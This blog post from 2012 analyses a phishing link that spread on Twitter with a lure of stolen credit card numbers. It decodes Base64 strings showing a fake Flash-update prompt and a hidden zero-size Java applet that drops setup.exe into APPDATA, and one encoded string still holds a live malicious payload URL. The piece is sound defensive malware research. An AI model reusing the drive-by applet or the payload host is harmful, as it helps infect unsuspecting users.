Journey of a Phishing Link

We come across so many links via social networking websites, and we unknowingly click on many of them. The malicious links have catastrophic results and the system, as well as yours privacy, is either compromised or your data takes the hit. This is an analysis of a link dated 17-April-2012 that I came across via Twitter and LinkedIn.

NOTE: All links have been appended with ‘non-clickable’ suffix “hxxp://” to prevent mistaken clicks.

Someone posted this link hxxp:// on a tweet. On checking, it was a list of URLs actually single URL pasted multiple times – a sign of desperation:

  1. hxxp://
  2. hxxp://
  3. hxxp://
  4. hxxp://
    9954 credit card numbers

It states this link has 9954 credit card numbers. The first malicious hint is – Why not posting it directly rather than pasting the same link 4 times in an entry.

Next, this is too much of a luring target to walk safe. Therefore, I opened the link in Malzilla (hxxp:// – a malware hunting tool. I disabled the auto-redirect. The link “hxxp://” redirected to “hxxp://”, which opened as text fields with scripts. The file contained only a ‘doubtful’ script with some headings and titles.

Here is the only important script contained within the page. Let us do the analysis.

This script – if too complex to understand due to large variable names – so let’s first change the variable names to shorter versions for better understanding. Here is the modified script with short variable names without changing the logic and working of it.

Now, it is easy to understand the logic and working of the script. First, let us decode the set Timeout and document.write fields. They look like Base64 Encoded so, let us try to decode them. The encoded strings are:

  1. QWRvYmUgRmxhc2ggbXVzdCBiZSB1cGRhdGVkIHRvIHZpZXcgdGhpcywgcGxlYXNlIGluc3RhbGwgdGhlI
  2. aHR0cDovLzIxMi45NS40My4yNDMvamRiL2xpYi9hZG9iZS5waHA/aWQ9MGI3NDBlYmNjMmFiYmM1NTE
  3. DQoJCTxhcHBsZXQgd2lkdGg9IjBweCIgaGVpZ2h0PSIwcHgiIGNvZGU9IlNpdGVMb2FkZXIuY2xhc3MiIGF


And the Decoded strings are:

(Adobe Flash must be updated to view this, please install the latest version!)

  1. hxxp://
  2. <applet width=”0px” height=”0px” code=”SiteLoader.class”
  3. archive=”hxxp://”>
    <param name=”wcZPN”
    <param name=”v8TOX” value=”setup.exe”>
    <param name=”Legym” value=””>
    <param name=”MpBDG” value=”APPDATA”>

The first decoded string has been set to entice the victim to click installing the ‘latest version’ of flash via their malicious link. So, we can see, it will again issue a GET request to the following links:

  1. hxxp://
  2. hxxp://
  3. hxxp://

And parameters are:

  1. name=”wcZPN”
  2. name=”v8TOX” value=”setup.exe
  3. name=”Legym” value=””
  4. name=”MpBDG” value=”APPDATA”

Let us now access these URLs.

  1. First I accessed the adobe.php URL
    (hxxp:// via Malzilla and it downloaded a file “Adobe-Flash_WIN.exe” on my system. The size of this file is approx 1.16 Mb. This file when scanned via VirusTotal had the catch rate of 2/42 anti-malware products. Now, this is scary. I did not get a chance to do the runtime analysis of this file but yes, I will post it in my next blog.
  2. On accessing the second URL
    (hxxp://, it downloads a JAR file “0b740ebcc2abbc5512c4875a0f74965b.jar”. This file when extracted results in the “META-INF” directory and “SiteLoader.class” file. The contents of META-INF includes,
  6. Now let us analyze the third URL load.php
    (hxxp:// via Malzilla. When accessed, this link downloads a “setup.exe” file on the host. This file is the same as the previous file as per the SHA56 hash “cb3869fa81086e4f91a61663ccac100f5099ccf4564a971f955f1a61d37aecf5”.

This is a brief analysis of a phishing link, which started via twitter as a PASTEBIN link, and made its way to reach your system through various files.


Rishi Narang
Senior Consultant,